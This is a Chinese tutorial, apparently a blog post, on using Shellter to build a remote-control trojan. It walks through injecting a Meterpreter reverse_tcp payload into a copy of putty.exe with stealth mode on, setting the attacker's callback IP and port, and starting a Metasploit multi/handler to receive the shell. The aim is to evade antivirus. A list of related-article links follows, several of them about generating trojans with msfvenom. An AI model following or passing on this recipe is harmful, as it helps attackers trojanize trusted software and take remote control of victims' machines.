使用Shellter生成远控木马并进行持久化控制
介绍
Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/
步骤
Shellter该软件可以直接在官网中下载后,直接在windows中运行,也可以下载好了以后拷贝到kali中运行,当然了也可以在kali中直接apt-get install shellter来进行安装,安装好的路径为:/usr/share/windows-resources/shellter
由于我这里安装的是最新版本的kali,没有办法直接在kali中打开Shellter.exe,即使是安装了wine32后还是无法打开(所以我这里就在windows中演示 shellter的使用)。
1.在windows中打开Shellter.exe这里选择A代表的是自动模式,回车。
2.然后进入到下面的界面,这个界面是进行联机检测版本的,直接输入Y然后回车即可。
3.PE target是进行免杀的exe预注入文件路径(或者文件),程序会被自动备份到shellter_backup文件夹下,防止文件被破坏。
ps:这里要注意的是,进行免杀的文件一定要是32位的,64位的文件是无法进行编译注入的
这里我选择是的putty.exe也是大家常用来做演示的,由于这个软件就在我shellter的目录下面,所以我这里就没有输入路径了。
4.回车后就开始进行编译注入了,耐心等待即可。
提示Successfully表示成功了,此时原本的putty.exe文件会被隔离到/Shellter_Backups/目录下面,在程序的根目录下面会生成一个新的putty.exe(已经注入后门的)
5.这里提示是否使用隐身模式,选择Y,这里提示选择列出的payload还是自定义,我们选择L,输入1选择第一个payload,然后设置回连IP和回连端口。
这里的payloads列出来的就是msf中常用的监听协议,就不具体介绍了。
set lhost:设置监听ip地址(攻击机的ip地址)
set lport:设置监听端口
6.回车,等待,提示按任意键结束。
7.打开kali中msf(具体的就不介绍了)
use use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp(payload要和上面在shellter中设置的一样)
8.options:查看参数
9. set lhost:设置监听ip地址(和shellter中一样)
set lport:设置监听端口(和shellter中一样)
10.执行exploit -j后台监听运行。
11.将之前用shellter生成带后门的文件,在本机(windows2008)中测试看是否上线。
12.测试是可以成功上线的,之前的时候shellter.exe貌似对免杀还是有很强的能力的,但是我个人测试的时候连火绒都过不去,可见免杀这东西果然是见光死啊。
使用Shellter生成远控木马并进行持久化控制相关推荐
- msf之msfvenom的使用—使用Kali渗透工具生成远控木马
一.先解释一下 msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线. (注意:msfvenom是在shell里使用的 ...
- msfvenom生成远控木马
1.生成病毒 在终端输入msfvenom -p windows/x64/meterpreter/reverse_tcp lhost =192.168.116.132 lport =12345 -f e ...
- 安全研究人员发现:Nanocore等多个远控木马滥用公有云服务传播
前言 攻击者越来越多的采用云来构建自己的基础设施,这样不仅能够使攻击者以最少的时间或金钱部署攻击基础设施,也能让追踪攻击行动变得更困难. 从 2021 年 10 月 26 日开始,研究人员发现多个远控 ...
- [网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进 ...
- “白加黑”远控木马技术分析及手杀方案
"白加黑"是民间对一种DLL劫持技术的通俗称呼,现在很多恶意程序利用这种劫持技术来绕过安全软件的主动防御以达到加载自身的目的,是目前很火的一种免杀手段.本文将针对此类病毒做了一个简 ...
- 远控木马上演白利用偷天神技:揭秘假破解工具背后的盗刷暗流
本文讲的是远控木马上演白利用偷天神技:揭秘假破解工具背后的盗刷暗流,如今,不少人为了省钱,会尝试各种免费的方法获取网盘或视频播放器的会员权限,网上也流传着不少"网盘不限速神器"或者 ...
- “大灰狼”远控木马分析及幕后真凶调查
9月初360安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序. 鉴于bt天堂电影下载网站 ...
- 移花接木大法:新型“白利用”华晨远控木马分析
360安全卫士 · 2015/05/28 5:11 0x00 前言 "白利用"是木马对抗主动防御类软件的一种常用手法.国内较早一批"白利用"木马是通过系统文件r ...
- 远控木马中的VIP:盗刷网购账户购买虚拟礼品卡
本文讲的是远控木马中的VIP:盗刷网购账户购买虚拟礼品卡,为了省钱,很多人会尝试各种各样的方法免费获取网盘和视频网站的VIP权限.正因为有这种需求,各种所谓的"网盘不限速神器"或是 ...
最新文章
- 【大牛疯狂教学】java程序员大专找不到工作
- 某学校学生在计算机等级水平测试中,提高中职学校计算机等级考试(一级)通过率的教学策略研究...
- Git 命令集 实践整理
- mysql crash_Mysql 无故crash
- 一步步编写操作系统 45 用c语言编写内核2
- 安装默认报表服务器虚拟目录,报表服务器虚拟目录(Reporting Services 配置)
- 互联网早报 | 3月16日 星期二 | 微信AI直播助理开放内测;汽车之家港交所挂牌上市;美团App内测“群聊”功能...
- SQLServer之深度分析跟踪
- (第一组_GNS3)基于上下文的访问控制
- 一直当菜鸟吧!——关于全局变量
- Flutter: 显示/关闭系统叠加层ui
- 【HBase学习】Apache HBase项目简介
- 2022年 微信大数据挑战赛
- c语言实现扫雷小游戏和扫雷源代码
- fw313r手机登录_迅捷(FAST)fw313r路由器初始密码_登录密码是多少?-192路由网
- linux常用rm命令详解,Linux中rm命令详解
- ios app 提交审核
- 多层板的板层布局和线宽的设置(记录)
- java pdf转jpg清晰度_java 库 pdfbox 将 pdf 文件转换成高清图片方法
- 在java中什么是迭代